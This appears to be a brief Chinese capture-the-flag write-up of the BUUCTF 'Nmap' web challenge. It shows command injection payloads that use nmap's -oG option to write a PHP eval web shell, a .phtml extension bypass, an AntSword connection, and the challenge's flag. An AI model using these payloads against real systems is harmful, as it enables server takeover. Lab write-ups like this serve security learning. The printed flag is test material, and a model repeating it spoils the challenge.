BUUCTF——Nmap
進入靶場
類似于一個nmap的網站
嘗試一下功能
沒什么用
看看數據包 既然跟IP相關
偽造一個XXF看看
拼接了一下沒什么用 果然沒這么簡單
嘗試一下命令注入
構造payload 127.0.0.1 | ls
應該有過濾 加了個\
直接構造個php木馬上傳試試
127.0.0.1 | ' <?php @eval($_POST["cmd"]);?> -oG shell.php '
應該被過濾了
也沒有什么提示 盲猜是后綴名 mini繞過試試
雙寫、php3都試過了 最后phtml成功了
127.0.0.1 | ' <?= @eval($_POST["cmd"]);?> -oG shell.phtml '
拼接訪問一下成功上傳
用蟻劍連接看看
成功連接
接下來就慢慢找flag
在根目錄下找到flag
flag{aade295d-204f-476f-91ee-299a5fa993a2}
下播!!!!!